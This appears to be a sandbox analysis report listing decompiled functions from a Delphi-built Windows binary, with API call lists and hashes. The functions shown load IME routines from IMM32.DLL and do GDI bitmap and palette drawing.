					if( *0x496bc0 == 0) {
						 *0x496bc0 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x47a9d8 == 0) {
						 *0x47a9d8 = LoadLibraryA("IMM32.DLL");
						if( *0x47a9d8 != 0) {
							_t11 =  *0x47a9d8; // 0x0
							 *0x496bc4 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x47a9d8; // 0x0
							 *0x496bc8 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x47a9d8; // 0x0
							 *0x496bcc = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x47a9d8; // 0x0
							 *0x496bd0 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x47a9d8; // 0x0
							 *0x496bd4 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x47a9d8; // 0x0
							 *0x496bd8 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x47a9d8; // 0x0
							 *0x496bdc = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x47a9d8; // 0x0
							 *0x496be0 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x47a9d8; // 0x0
							 *0x496be4 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x47a9d8; // 0x0
							 *0x496be8 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x441649);
					return SetErrorMode(_v8);
				}
			}


















                                                                        0x004414dd
                                                                        0x004414e1
                                                                        0x004414ea
                                                                        0x0044164c
                                                                        0x004414f0
                                                                        0x004414fa
                                                                        0x004414ff
                                                                        0x00441500
                                                                        0x00441505
                                                                        0x00441508
                                                                        0x00441512
                                                                        0x0044152b
                                                                        0x0044152b
                                                                        0x00441537
                                                                        0x00441547
                                                                        0x00441553
                                                                        0x0044155e
                                                                        0x00441569
                                                                        0x00441573
                                                                        0x0044157e
                                                                        0x00441588
                                                                        0x00441593
                                                                        0x0044159d
                                                                        0x004415a8
                                                                        0x004415b2
                                                                        0x004415bd
                                                                        0x004415c7
                                                                        0x004415d2
                                                                        0x004415dc
                                                                        0x004415e7
                                                                        0x004415f1
                                                                        0x004415fc
                                                                        0x00441606
                                                                        0x00441611
                                                                        0x0044161b
                                                                        0x00441626
                                                                        0x00441626
                                                                        0x00441553
                                                                        0x0044162d
                                                                        0x00441630
                                                                        0x00441633
                                                                        0x00441641
                                                                        0x00441641

                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00008000), ref: 004414F5
                                                                        • GetModuleHandleA.KERNEL32(USER32,00000000,00441642,?,00008000), ref: 00441519
                                                                        • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00441526
                                                                        • LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00441642,?,00008000), ref: 00441542
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00441564
                                                                        • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00441579
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044158E
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004415A3
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004415B8
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004415CD
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004415E2
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004415F7
                                                                        • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044160C
                                                                        • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00441621
                                                                        • SetErrorMode.KERNEL32(?,00441649,00008000), ref: 0044163C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                        • String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
                                                                        • API String ID: 3397921170-3271328588
                                                                        • Opcode ID: 41a94cf38aa0804b9e477ae109e7c998ef35792528566ebdd79e8338eb352709
                                                                        • Instruction ID: 689e1dabb6478f76fac1ff0258cb51012081a979876a385ea78672b4cdf9856c
                                                                        • Opcode Fuzzy Hash: 41a94cf38aa0804b9e477ae109e7c998ef35792528566ebdd79e8338eb352709
                                                                        • Instruction Fuzzy Hash: B8318FF0641350AFE700EFA5EC56A297BA8E354305B13483BF109DB6B1E67D98E08B1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00420CCC, Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E00420CCC(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				struct HPALETTE__* _v40;
				intOrPtr* _t78;
				struct HPALETTE__* _t89;
				struct HPALETTE__* _t95;
				int _t171;
				intOrPtr _t178;
				intOrPtr _t180;
				struct HDC__* _t182;
				int _t184;
				void* _t186;
				void* _t187;
				intOrPtr _t188;

				_t186 = _t187;
				_t188 = _t187 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t182 = __eax;
				_t184 = _a16;
				_t171 = _a20;
				_v13 = 1;
				_t78 =  *0x495c48; // 0x47a0ac
				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
					_v40 = 0;
					_v20 = E00420B28(CreateCompatibleDC(0));
					_push(_t186);
					_push(0x420f4c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					_v24 = E00420B28(CreateCompatibleBitmap(_a32, _t171, _t184));
					_v28 = SelectObject(_v20, _v24);
					_t89 =  *0x496a28; // 0xb7080776
					_v40 = SelectPalette(_a32, _t89, 0);
					SelectPalette(_a32, _v40, 0);
					if(_v40 == 0) {
						_t95 =  *0x496a28; // 0xb7080776
						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
					} else {
						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
					}
					RealizePalette(_v20);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
					_v32 = SetTextColor(_t182, 0);
					_v36 = SetBkColor(_t182, 0xffffff);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
					SetTextColor(_t182, _v32);
					SetBkColor(_t182, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(E00420F53);
					if(_v40 != 0) {
						SelectPalette(_v20, _v40, 0);
					}
					return DeleteDC(_v20);
				} else {
					_v24 = E00420B28(CreateCompatibleBitmap(_a32, 1, 1));
					_v24 = SelectObject(_a12, _v24);
					_push(_t186);
					_push(0x420d9f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407308(0xaa0029, 0xcc0020));
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(E00420F53);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}























                                                                        0x00420ccd
                                                                        0x00420ccf
                                                                        0x00420cd5
                                                                        0x00420cd8
                                                                        0x00420cdb
                                                                        0x00420cdd
                                                                        0x00420ce0
                                                                        0x00420ce3
                                                                        0x00420ce7
                                                                        0x00420cef
                                                                        0x00420da8
                                                                        0x00420db7
                                                                        0x00420dbc
                                                                        0x00420dbd
                                                                        0x00420dc2
                                                                        0x00420dc5
                                                                        0x00420dd8
                                                                        0x00420de8
                                                                        0x00420ded
                                                                        0x00420dfc
                                                                        0x00420e09
                                                                        0x00420e12
                                                                        0x00420e2a
                                                                        0x00420e39
                                                                        0x00420e14
                                                                        0x00420e23
                                                                        0x00420e23
                                                                        0x00420e40
                                                                        0x00420e62
                                                                        0x00420e84
                                                                        0x00420e91
                                                                        0x00420e9f
                                                                        0x00420ec6
                                                                        0x00420eeb
                                                                        0x00420ef5
                                                                        0x00420eff
                                                                        0x00420f08
                                                                        0x00420f12
                                                                        0x00420f12
                                                                        0x00420f1b
                                                                        0x00420f22
                                                                        0x00420f25
                                                                        0x00420f28
                                                                        0x00420f31
                                                                        0x00420f3d
                                                                        0x00420f3d
                                                                        0x00420f4b
                                                                        0x00420d07
                                                                        0x00420d19
                                                                        0x00420d29
                                                                        0x00420d2e
                                                                        0x00420d2f
                                                                        0x00420d34
                                                                        0x00420d37
                                                                        0x00420d73
                                                                        0x00420d7a
                                                                        0x00420d7d
                                                                        0x00420d80
                                                                        0x00420d92
                                                                        0x00420d9e
                                                                        0x00420d9e

                                                                        APIs
                                                                        • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420D0F
                                                                        • SelectObject.GDI32(?,?), ref: 00420D24
                                                                        • MaskBlt.GDI32(?,?,?,?,?,?,00000000,0042011F,?,?,?,00000000,00000000,00420D9F,?,?), ref: 00420D73
                                                                        • SelectObject.GDI32(?,?), ref: 00420D8D
                                                                        • DeleteObject.GDI32(?), ref: 00420D99
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00420DAD
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00420DCE
                                                                        • SelectObject.GDI32(?,?), ref: 00420DE3
                                                                        • SelectPalette.GDI32(?,B7080776,00000000), ref: 00420DF7
                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 00420E09
                                                                        • SelectPalette.GDI32(?,00000000,000000FF), ref: 00420E1E
                                                                        • SelectPalette.GDI32(?,B7080776,000000FF), ref: 00420E34
                                                                        • RealizePalette.GDI32(?), ref: 00420E40
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00420E62
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,0042011F,?,?,00440328), ref: 00420E84
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00420E8C
                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 00420E9A
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00420EC6
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420EEB
                                                                        • SetTextColor.GDI32(?,0042011F), ref: 00420EF5
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00420EFF
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420F12
                                                                        • DeleteObject.GDI32(?), ref: 00420F1B
                                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 00420F3D
                                                                        • DeleteDC.GDI32(?), ref: 00420F46
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                                        • String ID:
                                                                        • API String ID: 3976802218-0
                                                                        • Opcode ID: dc01e1ed2023787ed6e24c7143467bd4d3dcb23ac5b5962359c221aa4fe5371a
                                                                        • Instruction ID: 5ed571c653ffefc6f61770c509f2f379e260f00009d4f5806ec2ee285bbd0929
                                                                        • Opcode Fuzzy Hash: dc01e1ed2023787ed6e24c7143467bd4d3dcb23ac5b5962359c221aa4fe5371a
                                                                        • Instruction Fuzzy Hash: D781C3B1A04218AFDB50EFA9CD81EAF77ECEB0D314F114419F618F7281C639AD508B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004240C0, Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E004240C0(void* __eax, long __ecx, struct HPALETTE__* __edx) {
				struct HBITMAP__* _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				int _t68;
				long _t82;
				void* _t117;
				intOrPtr _t126;
				intOrPtr _t127;
				long _t130;
				struct HPALETTE__* _t133;
				void* _t137;
				void* _t139;
				intOrPtr _t140;

				_t137 = _t139;
				_t140 = _t139 + 0xffffff90;
				_t130 = __ecx;
				_t133 = __edx;
				_t117 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E004235B4(_t117);
					_v12 = 0;
					_v20 = 0;
					_push(_t137);
					_push(0x4242bb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t140;
					_v12 = E00420B28(GetDC(0));
					_v20 = E00420B28(CreateCompatibleDC(_v12));
					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
					if(_v8 == 0) {
						L18:
						_t68 = 0;
						_pop(_t126);
						 *[fs:eax] = _t126;
						_push(0x4242c2);
						if(_v20 != 0) {
							_t68 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							return ReleaseDC(0, _v12);
						}
						return _t68;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(_t130 != 0x1fffffff) {
							_v16 = E00420B28(CreateCompatibleDC(_v12));
							_push(_t137);
							_push(0x424273);
							_push( *[fs:eax]);
							 *[fs:eax] = _t140;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t117 = E004239F8(_t117, _t133, _t133, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t117);
							if(_t133 != 0) {
								SelectPalette(_v16, _t133, 0);
								RealizePalette(_v16);
								SelectPalette(_v20, _t133, 0);
								RealizePalette(_v20);
							}
							_t82 = SetBkColor(_v16, _t130);
							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
							SetBkColor(_v16, _t82);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t117);
							}
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x42427a);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L18;
						}
					}
				}
			}

























                                                                        0x004240c1
                                                                        0x004240c3
                                                                        0x004240c9
                                                                        0x004240cb
                                                                        0x004240cd
                                                                        0x004240d1
                                                                        0x004240d6
                                                                        0x004242cb
                                                                        0x004240f0
                                                                        0x004240f2
                                                                        0x004240f9
                                                                        0x004240fe
                                                                        0x00424103
                                                                        0x00424104
                                                                        0x00424109
                                                                        0x0042410c
                                                                        0x0042411b
                                                                        0x0042412c
                                                                        0x00424142
                                                                        0x00424149
                                                                        0x0042428d
                                                                        0x0042428d
                                                                        0x0042428f
                                                                        0x00424292
                                                                        0x00424295
                                                                        0x0042429e
                                                                        0x004242a4
                                                                        0x004242a4
                                                                        0x004242ad
                                                                        0x00000000
                                                                        0x004242b5
                                                                        0x004242ba
                                                                        0x0042414f
                                                                        0x0042415c
                                                                        0x00424165
                                                                        0x00424191
                                                                        0x00424196
                                                                        0x00424197
                                                                        0x0042419c
                                                                        0x0042419f
                                                                        0x004241a6
                                                                        0x004241c6
                                                                        0x004241a8
                                                                        0x004241a8
                                                                        0x004241ae
                                                                        0x004241c2
                                                                        0x004241c2
                                                                        0x004241d4
                                                                        0x004241d9
                                                                        0x004241e2
                                                                        0x004241eb
                                                                        0x004241f7
                                                                        0x00424200
                                                                        0x00424200
                                                                        0x0042420a
                                                                        0x0042422e
                                                                        0x00424238
                                                                        0x00424241
                                                                        0x0042424b
                                                                        0x0042424b
                                                                        0x00424254
                                                                        0x00424257
                                                                        0x00424257
                                                                        0x0042425e
                                                                        0x00424261
                                                                        0x00424264
                                                                        0x00424272
                                                                        0x00424167
                                                                        0x00424179
                                                                        0x0042427e
                                                                        0x00424288
                                                                        0x00424288
                                                                        0x00000000
                                                                        0x0042427e
                                                                        0x00424165
                                                                        0x00424149

                                                                        APIs
                                                                        • GetObjectA.GDI32(00000000,00000054,?), ref: 004240E3
                                                                        • GetDC.USER32(00000000), ref: 00424111
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00424122
                                                                        • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0042413D
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424157
                                                                        • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00424179
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00424187
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004241CF
                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 004241E2
                                                                        • RealizePalette.GDI32(00000000), ref: 004241EB
                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 004241F7
                                                                        • RealizePalette.GDI32(?), ref: 00424200
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 0042420A
                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0042422E
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00424238
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042424B
                                                                        • DeleteObject.GDI32(00000000), ref: 00424257
                                                                        • DeleteDC.GDI32(00000000), ref: 0042426D
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424288
                                                                        • DeleteDC.GDI32(00000000), ref: 004242A4
                                                                        • ReleaseDC.USER32 ref: 004242B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                        • String ID:
                                                                        • API String ID: 332224125-0
                                                                        • Opcode ID: 6f5505679764149f8975d96c7f15921c777c432716e7e995d3116d72c8a38ef9
                                                                        • Instruction ID: b199b53a5d34a191db7efce3f80a8b69dcc7b03c55fcec5dd27acc42e0efb18e
                                                                        • Opcode Fuzzy Hash: 6f5505679764149f8975d96c7f15921c777c432716e7e995d3116d72c8a38ef9
                                                                        • Instruction Fuzzy Hash: AC514C71F04214ABDB10EBEADC45FAFB7FCEB48704F51486AB214F7281D67899408B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00424EBC, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E00424EBC(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				void* _v24;
				BITMAPINFOHEADER* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				struct HBITMAP__* _v44;
				void* _v48;
				struct HPALETTE__* _v52;
				struct HPALETTE__* _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t164;
				signed int _t193;
				signed int _t218;
				signed short _t224;
				intOrPtr _t251;
				intOrPtr* _t255;
				intOrPtr _t261;
				intOrPtr _t299;
				intOrPtr _t300;
				intOrPtr _t305;
				signed int _t307;
				signed int _t327;
				void* _t329;
				void* _t330;
				signed int _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr _t335;

				_t326 = __edi;
				_t333 = _t334;
				_t335 = _t334 + 0xffffff54;
				_t329 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t332);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E00402754(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t333);
				_push(0x4253d9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_push(_t333);
				_push(0x4253ac);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 8))();
					_t330 = _t329 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E004035AC(1);
						if(_a4 == 0) {
							E00402EF0( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t330;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						E00416BB4(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
						 *((intOrPtr*)( *_v60 + 0x10))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 8))();
					_t261 = _v64;
					E00402EF0(_t261, 0x28);
					_t251 = _t261;
					 *(_t251 + 4) = _v72 & 0x0000ffff;
					 *(_t251 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t251 + 0xc)) = _v68;
					 *((short*)(_t251 + 0xe)) = _v66;
					_t330 = _t329 - 0xc;
				}
				_t255 = _v64;
				 *_t255 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t255 + 0xc)) != 1) {
					E00420A08();
				}
				if(_v36 == 0x28) {
					_t224 =  *(_t255 + 0xe);
					if(_t224 == 0x10 || _t224 == 0x20) {
						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
							E00416B44(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t330 = _t330 - 0xc;
						}
					}
				}
				if( *(_t255 + 0x20) == 0) {
					 *(_t255 + 0x20) = E00420C98( *(_t255 + 0xe));
				}
				_t327 = _v37 & 0x000000ff;
				_t267 =  *(_t255 + 0x20) * 0;
				E00416B44(_v12,  *(_t255 + 0x20) * 0, _v32);
				_t331 = _t330 -  *(_t255 + 0x20) * 0;
				if( *(_t255 + 0x14) == 0) {
					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
					_t218 = E00420CB8( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
					asm("cdq");
					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
				}
				_t160 =  *(_t255 + 0x14);
				if(_t331 > _t160) {
					_t331 = _t160;
				}
				if(_v37 != 0) {
					E00420F60(_v32);
				}
				_v16 = E00420B28(GetDC(0));
				_push(_t333);
				_push(0x425327);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_t164 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t164 == 0 || _t164 == 3) {
					if( *0x47a514 == 0) {
						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040B330(_t255, _t267, _t327, _t331);
							} else {
								E00420A08();
							}
						}
						_push(_t333);
						_push( *[fs:eax]);
						 *[fs:eax] = _t335;
						E00416B44(_v12, _t331, _v24);
						_pop(_t299);
						 *[fs:eax] = _t299;
						_t300 = 0x4252f6;
						 *[fs:eax] = _t300;
						_push(E0042532E);
						return ReleaseDC(0, _v16);
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E00402754(_t331);
					_push(_t333);
					_push(0x42528f);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_t273 = _t331;
					E00416B44(_v12, _t331, _v24);
					_v20 = E00420B28(CreateCompatibleDC(_v16));
					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
					_v56 = 0;
					_t193 =  *(_v64 + 0x20);
					if(_t193 > 0) {
						_t273 = _t193;
						_v52 = E00421218(0, _t193);
						_v56 = SelectPalette(_v20, _v52, 0);
						RealizePalette(_v20);
					}
					_push(_t333);
					_push(0x425263);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040B330(_t255, _t273, _t327, _t331);
						} else {
							E00420A08();
						}
					}
					_pop(_t305);
					 *[fs:eax] = _t305;
					_push(E0042526A);
					if(_v56 != 0) {
						SelectPalette(_v20, _v56, 0xffffffff);
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}














































                                                                        0x00424ebc
                                                                        0x00424ebd
                                                                        0x00424ebf
                                                                        0x00424ec8
                                                                        0x00424eca
                                                                        0x00424ecd
                                                                        0x00424ed2
                                                                        0x00424ed7
                                                                        0x00424edc
                                                                        0x00424eec
                                                                        0x00424ef3
                                                                        0x00424efb
                                                                        0x00424efd
                                                                        0x00424efd
                                                                        0x00424f14
                                                                        0x00424f1a
                                                                        0x00424f1f
                                                                        0x00424f20
                                                                        0x00424f25
                                                                        0x00424f28
                                                                        0x00424f2d
                                                                        0x00424f2e
                                                                        0x00424f33
                                                                        0x00424f36
                                                                        0x00424f3d
                                                                        0x00424f9c
                                                                        0x00424f9f
                                                                        0x00424fa5
                                                                        0x00424fab
                                                                        0x00424fc5
                                                                        0x00424fcc
                                                                        0x00424fdb
                                                                        0x00424fe0
                                                                        0x00424fee
                                                                        0x00424ffa
                                                                        0x00424ffa
                                                                        0x0042500a
                                                                        0x0042501a
                                                                        0x0042502e
                                                                        0x0042503d
                                                                        0x0042504f
                                                                        0x00425055
                                                                        0x00425055
                                                                        0x00424f3f
                                                                        0x00424f4f
                                                                        0x00424f52
                                                                        0x00424f5e
                                                                        0x00424f63
                                                                        0x00424f69
                                                                        0x00424f70
                                                                        0x00424f77
                                                                        0x00424f7f
                                                                        0x00424f83
                                                                        0x00424f83
                                                                        0x00425058
                                                                        0x0042505e
                                                                        0x00425066
                                                                        0x0042506e
                                                                        0x00425070
                                                                        0x00425070
                                                                        0x00425079
                                                                        0x0042507b
                                                                        0x00425083
                                                                        0x0042508f
                                                                        0x0042509c
                                                                        0x004250a1
                                                                        0x004250a5
                                                                        0x004250a5
                                                                        0x0042508f
                                                                        0x00425083
                                                                        0x004250ac
                                                                        0x004250b7
                                                                        0x004250b7
                                                                        0x004250bd
                                                                        0x004250c9
                                                                        0x004250d2
                                                                        0x004250e4
                                                                        0x004250ea
                                                                        0x004250ec
                                                                        0x004250f8
                                                                        0x00425102
                                                                        0x00425107
                                                                        0x0042510a
                                                                        0x0042510a
                                                                        0x0042510d
                                                                        0x00425112
                                                                        0x00425114
                                                                        0x00425114
                                                                        0x0042511a
                                                                        0x0042511f
                                                                        0x0042511f
                                                                        0x00425130
                                                                        0x00425135
                                                                        0x00425136
                                                                        0x0042513b
                                                                        0x0042513e
                                                                        0x00425144
                                                                        0x00425149
                                                                        0x00425157
                                                                        0x004252ad
                                                                        0x004252b4
                                                                        0x004252c3
                                                                        0x004252cc
                                                                        0x004252c5
                                                                        0x004252c5
                                                                        0x004252c5
                                                                        0x004252c3
                                                                        0x004252d3
                                                                        0x004252d9
                                                                        0x004252dc
